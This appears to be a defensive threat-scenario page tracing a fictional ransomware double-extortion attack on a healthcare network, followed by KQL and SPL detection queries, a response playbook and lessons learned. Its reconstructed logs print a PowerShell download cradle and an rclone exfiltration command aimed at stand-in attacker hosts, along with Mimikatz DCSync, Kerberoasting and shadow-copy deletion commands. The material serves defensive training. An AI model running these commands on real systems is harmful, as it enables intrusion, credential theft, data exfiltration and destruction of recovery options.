Skip to content

SC-049: Ransomware Double Extortion

Scenario Overview

The threat actor group "CRIMSON JACKAL" targets a mid-size healthcare organization through a spear-phishing campaign delivering a malicious macro document. After gaining initial access, the attackers deploy Cobalt Strike beacons, enumerate Active Directory, escalate privileges to Domain Admin, and exfiltrate 2TB of patient data to attacker-controlled cloud storage. The final stage deploys ransomware across all domain-joined systems, encrypting critical healthcare databases, imaging systems, and EHR platforms. A ransom note demands $4.2M in cryptocurrency, backed by a threat to publish stolen patient records on the group's leak site.

Environment: MedTech Health Systems corporate network at 10.50.0.0/16; Active Directory domain medtech.example.com Initial Access: Spear-phishing email with malicious Word document (T1566.001) Impact: $4.2M ransom demand, 2TB patient data exfiltrated, 14-day operational disruption Difficulty: Advanced Sector: Healthcare

Attack Timeline

Timestamp (UTC) Phase Action
2026-03-01 09:14:00 Initial Access Phishing email delivered to billing department (accounts@medtech.example.com)
2026-03-01 09:22:00 Execution User opens macro-enabled document; PowerShell stager executes
2026-03-01 09:24:00 C2 Establishment Cobalt Strike HTTPS beacon established to c2.update-service.example.com
2026-03-01 11:00:00 Discovery AD enumeration via BloodHound, network scanning with AdFind
2026-03-01 14:30:00 Credential Access Kerberoasting against service accounts; offline hash cracking
2026-03-02 02:15:00 Privilege Escalation Domain Admin obtained via cracked SVC-SQL account password
2026-03-02 03:00:00 Lateral Movement PSExec to domain controllers and file servers
2026-03-02 04:00:00 Collection Staging patient data from EHR database and file shares
2026-03-02 04:30:00 Exfiltration Data exfiltration to cloud storage via rclone (2TB over 18 hours)
2026-03-03 00:00:00 Impact — Encryption Ransomware binary deployed via GPO to all domain-joined systems
2026-03-03 00:15:00 Impact — Ransom Note Ransom note dropped on all encrypted systems with leak site URL
2026-03-03 06:00:00 Detection SOC alerted by mass file rename activity and backup failures

Technical Analysis

Phase 1: Initial Access — Spear-Phishing Email

CRIMSON JACKAL sends a targeted phishing email impersonating a healthcare insurance provider with a malicious Word document attachment.

# Phishing email headers (reconstructed from mail gateway logs)
From: claims@healthinsure-partners.example.com
To: accounts@medtech.example.com
Subject: URGENT: Updated Insurance Claim Form Q1-2026
Date: Sat, 01 Mar 2026 09:14:22 +0000
X-Mailer: Microsoft Outlook 16.0
Attachment: Insurance_Claim_Form_Q1_2026.docm (SHA256: a1b2c3d4...REDACTED)

# Mail gateway analysis:
# - SPF: PASS (attacker registered lookalike domain)
# - DKIM: PASS (attacker controls sending domain)
# - DMARC: PASS
# - Attachment: .docm (macro-enabled) — not blocked by policy
# - No sandbox detonation configured for .docm files

Phase 2: Execution — Macro and PowerShell Stager

The malicious macro executes a PowerShell download cradle that retrieves and launches a Cobalt Strike beacon.

# Macro payload (reconstructed — educational only)
# Stage 1: VBA macro executes PowerShell via WMI
# Event source: Microsoft-Windows-Sysmon/Operational

# Process creation (Event ID 1):
# ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
# CommandLine: powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0A...
# User: MEDTECH\jsmith

# Decoded PowerShell (base64):
# $client = New-Object System.Net.WebClient
# $client.Headers.Add("User-Agent","Mozilla/5.0")
# $data = $client.DownloadData("https://cdn-assets.example.com/update.bin")
# $assembly = [System.Reflection.Assembly]::Load($data)
# $assembly.EntryPoint.Invoke($null, @())

# Stage 2: Cobalt Strike beacon loaded reflectively into memory
# No file dropped to disk — fileless execution
# Beacon config (extracted from memory):
#   C2: c2.update-service.example.com:443 (HTTPS)
#   Polling interval: 60 seconds
#   Jitter: 37%
#   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Phase 3: Discovery — Active Directory Enumeration

The attacker uses BloodHound and AdFind to map the AD environment and identify attack paths to Domain Admin.

# AD enumeration commands (from endpoint EDR telemetry)
# Host: 10.50.10.25 (MEDTECH\jsmith workstation)

# SharpHound collection (in-memory execution via Cobalt Strike)
# Sysmon Event ID 1:
# Process: C:\Windows\System32\cmd.exe
# CommandLine: cmd.exe /c "C:\Users\jsmith\AppData\Local\Temp\s.exe -c All --outputdirectory C:\Users\jsmith\AppData\Local\Temp"

# AdFind queries observed:
adfind.exe -f "(objectcategory=computer)" -csv name operatingSystem
adfind.exe -f "(objectcategory=group)" -csv name member
adfind.exe -f "(&(objectCategory=person)(objectClass=user)(adminCount=1))" -csv name
adfind.exe -f "(servicePrincipalName=*)" -csv name servicePrincipalName

# Network scanning (internal):
# Source: 10.50.10.25
# Targets: 10.50.0.0/16
# Ports: 445, 3389, 22, 1433, 3306, 5985
# Tool: Cobalt Strike port scan module

Phase 4: Credential Access — Kerberoasting

The attacker requests service tickets for accounts with SPNs and cracks them offline.

# Kerberoasting (from domain controller security logs)
# Event ID 4769: Kerberos Service Ticket Request
# Multiple TGS requests for service accounts in rapid succession

# Targeted service accounts:
# SVC-SQL       — MSSQLSvc/sqlprod01.medtech.example.com:1433
# SVC-BACKUP    — backupexec/backup01.medtech.example.com
# SVC-EXCHANGE  — exchangeMDB/mail01.medtech.example.com

# Ticket encryption: RC4_HMAC_MD5 (0x17) — weak, crackable
# All requests from single source: 10.50.10.25
# Time window: 14:30:05 to 14:30:08 (3 seconds — automated tool)

# Offline cracking (attacker-side, reconstructed):
# hashcat -m 13100 -a 0 kerberoast_hashes.txt wordlist.txt -r rules.rule
# SVC-SQL hash cracked in 4 hours: Summer2025! (complexity met but dictionary-based)

Phase 5: Lateral Movement and Privilege Escalation

With the cracked SVC-SQL password, the attacker escalates to Domain Admin through a misconfigured group membership.

# SVC-SQL was member of "Database Admins" group
# "Database Admins" group was nested inside "Domain Admins" — misconfiguration
# This granted the attacker Domain Admin privileges

# Lateral movement via PsExec (Sysmon Event ID 1):
# Source: 10.50.10.25
# Targets: 10.50.1.10 (DC01), 10.50.1.11 (DC02), 10.50.5.20 (FILE01)
#
# psexec.exe \\10.50.1.10 -u MEDTECH\SVC-SQL -p REDACTED cmd.exe
# psexec.exe \\10.50.5.20 -u MEDTECH\SVC-SQL -p REDACTED cmd.exe

# On domain controller (10.50.1.10):
# DCSync attack to dump all domain password hashes
# Mimikatz: lsadump::dcsync /domain:medtech.example.com /all
# Event ID 4662: Directory Service Access (DCSync indicator)
# Properties: {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} — DS-Replication-Get-Changes-All

Phase 6: Collection and Exfiltration

The attacker stages and exfiltrates 2TB of patient records and financial data using rclone to attacker-controlled cloud storage.

# Data staging (from file server 10.50.5.20):
# Targeted directories:
#   \\FILE01\PatientRecords\      — 890 GB (PHI, medical images)
#   \\FILE01\Finance\             — 340 GB (billing, insurance claims)
#   \\FILE01\HR\                  — 180 GB (employee PII)
#   \\SQLPROD01\EHR_Backup\       — 620 GB (EHR database exports)

# Exfiltration via rclone (from EDR process telemetry):
# Process: C:\Users\Public\rclone.exe
# CommandLine: rclone.exe copy "\\FILE01\PatientRecords" remote:exfil-bucket --transfers 8 --bwlimit 50M
# Destination: storage.cloud-backup.example.com (attacker-controlled)
# Duration: ~18 hours at throttled bandwidth
# Total exfiltrated: 2.03 TB

# Network indicators:
# Sustained outbound HTTPS traffic from 10.50.5.20
# Destination: 203.0.113.45:443 (cloud storage endpoint)
# Average throughput: 50 Mbps (intentionally throttled to avoid detection)

Phase 7: Ransomware Deployment

CRIMSON JACKAL deploys ransomware across all domain-joined systems via Group Policy Object.

# Ransomware deployment via GPO (from domain controller logs)
# Attacker creates new GPO: "System Security Update — March 2026"
# Links GPO to root domain OU (affects all domain-joined systems)

# GPO configuration:
# Computer Configuration > Policies > Windows Settings > Scripts > Startup
# Script: \\medtech.example.com\SYSVOL\medtech.example.com\scripts\sysupdate.exe
# SHA256: e5f6g7h8...REDACTED (CRIMSONLOCK ransomware variant)

# Ransomware behavior:
# 1. Terminates security software processes (Defender, EDR agents)
# 2. Deletes Volume Shadow Copies: vssadmin delete shadows /all /quiet
# 3. Disables Windows Recovery: bcdedit /set {default} recoveryenabled No
# 4. Encrypts files with AES-256 + RSA-4096 hybrid encryption
# 5. Appends .crimson extension to encrypted files
# 6. Drops ransom note: CRIMSON_RECOVERY.txt in every directory

# Targeted file extensions:
# .mdb .accdb .sql .bak .docx .xlsx .pdf .pst .dicom .hl7 .jpg .png

# Exclusions (to keep system bootable):
# C:\Windows\*, *.exe, *.dll, *.sys

# Ransom note content:
# "Your network has been compromised by CRIMSON JACKAL.
#  All files are encrypted with military-grade encryption.
#  We have also downloaded 2TB of your data including patient records.
#  Payment: 65 BTC ($4,200,000) to wallet: [REDACTED]
#  Leak site: http://crimsonjkl[REDACTED].onion
#  Deadline: 7 days or data will be published."

Detection Opportunities

KQL — Suspicious PowerShell Download Cradle

// Detect PowerShell download cradles commonly used by initial access tools
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName == "powershell.exe" or FileName == "pwsh.exe"
| where ProcessCommandLine has_any (
    "DownloadString", "DownloadData", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "iwr",
    "Start-BitsTransfer", "Invoke-RestMethod"
  )
| where InitiatingProcessFileName in ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")
| project TimeGenerated, DeviceName, AccountName,
    InitiatingProcessFileName, ProcessCommandLine
| sort by TimeGenerated desc

KQL — Kerberoasting Detection

// Detect Kerberoasting via multiple TGS requests with RC4 encryption
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"  // RC4_HMAC_MD5
| where ServiceName !endswith "$"  // Exclude machine accounts
| summarize
    TicketCount = count(),
    UniqueServices = dcount(ServiceName),
    Services = make_set(ServiceName),
    SourceIPs = make_set(IpAddress)
    by AccountName = TargetUserName, bin(TimeGenerated, 5m)
| where TicketCount > 3
| where UniqueServices > 2
| sort by TicketCount desc

KQL — Ransomware File Encryption Activity

// Detect mass file rename operations indicative of ransomware
DeviceFileEvents
| where TimeGenerated > ago(1h)
| where ActionType == "FileRenamed"
| where FileName endswith ".crimson" or FileName endswith ".locked"
    or FileName endswith ".encrypted"
| summarize
    RenameCount = count(),
    UniqueDirectories = dcount(FolderPath),
    FirstSeen = min(TimeGenerated),
    LastSeen = max(TimeGenerated)
    by DeviceName
| where RenameCount > 100
| where UniqueDirectories > 5
| extend DurationMinutes = datetime_diff('minute', LastSeen, FirstSeen)
| sort by RenameCount desc

KQL — Rclone Exfiltration Detection

// Detect rclone or similar cloud sync tools used for data exfiltration
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where FileName in ("rclone.exe", "rclone", "megacmd.exe", "megasync.exe")
    or ProcessCommandLine has_any ("rclone", "copy remote:", "sync remote:")
| project TimeGenerated, DeviceName, AccountName,
    FileName, ProcessCommandLine, InitiatingProcessFileName
| sort by TimeGenerated desc

SPL — Cobalt Strike Beacon Detection via Network

index=proxy sourcetype="squid" OR sourcetype="bluecoat"
  cs_method=GET
| eval uri_len=len(cs_uri_path)
| stats count as requests
        avg(bytes_out) as avg_bytes
        stdev(bytes_out) as stdev_bytes
        values(cs_uri_path) as paths
        by src_ip dest_host
| where requests > 50
| where stdev_bytes < 100
| where avg_bytes < 1000
| eval beacon_score = if(stdev_bytes < 50 AND requests > 100, "HIGH",
    if(stdev_bytes < 100 AND requests > 50, "MEDIUM", "LOW"))
| where beacon_score IN ("HIGH", "MEDIUM")
| sort -requests

SPL — Mass File Encryption Detection

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=11 OR EventCode=2
| rex field=TargetFilename "\.(?<extension>[^.]+)$"
| where extension IN ("crimson", "locked", "encrypted", "crypt")
| stats count as encrypted_files
        dc(TargetFilename) as unique_files
        dc(Image) as encrypting_processes
        values(Image) as process_list
        by Computer
| where encrypted_files > 50
| sort -encrypted_files

SPL — Volume Shadow Copy Deletion

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (CommandLine="*vssadmin*delete*shadows*" OR
   CommandLine="*wmic*shadowcopy*delete*" OR
   CommandLine="*bcdedit*/set*recoveryenabled*No*")
| stats count by Computer User CommandLine ParentImage _time
| sort _time

SPL — Rclone Data Exfiltration

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (Image="*rclone*" OR CommandLine="*rclone*" OR CommandLine="*copy*remote:*")
| stats count as executions
        values(CommandLine) as commands
        values(User) as users
        by Computer
| sort -executions

Response Playbook

Immediate Containment (0-30 minutes)

  1. Isolate infected systems from the network immediately — disable switch ports or quarantine via EDR
  2. Disable compromised accounts: SVC-SQL, Domain Admin accounts, jsmith account
  3. Block C2 domains and IPs: c2.update-service.example.com, cdn-assets.example.com, 203.0.113.45
  4. Remove malicious GPO: Delete "System Security Update — March 2026" from AD
  5. Preserve forensic evidence: Memory dumps of infected systems before reimaging
  6. Activate incident response retainer and notify legal counsel

Eradication (30 minutes - 48 hours)

  1. Reset all Domain Admin and service account passwords — assume all credentials compromised
  2. Reset KRBTGT account password twice (with 12-hour interval) to invalidate Golden Tickets
  3. Audit AD group memberships: Remove nested group misconfigurations (Database Admins in Domain Admins)
  4. Scan all endpoints for Cobalt Strike beacons and ransomware artifacts
  5. Revoke all active Kerberos tickets across the domain
  6. Block rclone and similar tools via application control policy
  7. Engage threat intelligence to monitor leak site for data publication

Recovery (48 hours - 14 days)

  1. Restore from offline backups — verify backup integrity before restoration
  2. Rebuild domain controllers from known-good media if DCSync was confirmed
  3. Implement network segmentation between clinical and administrative networks
  4. Deploy MFA on all privileged accounts and remote access
  5. Enable advanced email filtering with sandbox detonation for macro-enabled documents
  6. Notify HHS/OCR per HIPAA breach notification requirements (within 60 days)
  7. Offer credit monitoring to affected patients per regulatory requirements
  8. Conduct tabletop exercise with updated ransomware playbook

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Scenario Phase
Initial Access T1566.001 Phishing: Spearphishing Attachment Malicious Word document delivery
Execution T1059.001 Command and Scripting Interpreter: PowerShell PowerShell download cradle
Persistence T1543.003 Create or Modify System Process: Windows Service Cobalt Strike service persistence
Privilege Escalation T1078.002 Valid Accounts: Domain Accounts Cracked SVC-SQL credentials
Credential Access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting Service ticket cracking
Discovery T1087.002 Account Discovery: Domain Account BloodHound / AdFind enumeration
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares PsExec to DC and file servers
Collection T1039 Data from Network Shared Drive Patient records from file shares
Exfiltration T1567.002 Exfiltration Over Web Service: to Cloud Storage Rclone to attacker cloud storage
Impact T1486 Data Encrypted for Impact CRIMSONLOCK ransomware deployment
Impact T1490 Inhibit System Recovery Shadow copy deletion

Lessons Learned

  1. Macro-enabled documents remain a primary initial access vector: The organization had no policy to block .docm attachments or enforce Protected View. Disabling macros by default and implementing sandbox detonation for email attachments would have prevented initial compromise.

  2. Kerberoasting targets weak service account passwords: The SVC-SQL account used a dictionary-based password that was cracked in 4 hours. Service accounts should use managed service accounts (gMSA) with automatically rotated 120+ character passwords, eliminating Kerberoasting as an attack path.

  3. Nested AD group memberships create hidden privilege escalation paths: The Database Admins group nested inside Domain Admins was an overlooked misconfiguration. Regular AD hygiene audits with tools like BloodHound (used defensively) would have identified this attack path before adversaries did.

  4. Data exfiltration preceded encryption by 18+ hours: The double extortion model means that even with perfect backups, the organization still faces data exposure. DLP controls monitoring for bulk data transfers to unauthorized cloud destinations and blocking tools like rclone would have detected or prevented exfiltration.

  5. GPO-based ransomware deployment affects all domain-joined systems simultaneously: Monitoring GPO creation and modification events (Event ID 5136, 5137) and alerting on new startup scripts would have provided earlier detection of the deployment mechanism.

  6. Healthcare organizations face compounded regulatory impact: Beyond the ransom demand, HIPAA breach notification requirements, OCR investigations, and potential fines significantly amplify the total cost of a ransomware incident in healthcare. The estimated total cost including regulatory penalties, legal fees, and remediation exceeded $12M.

Cross-References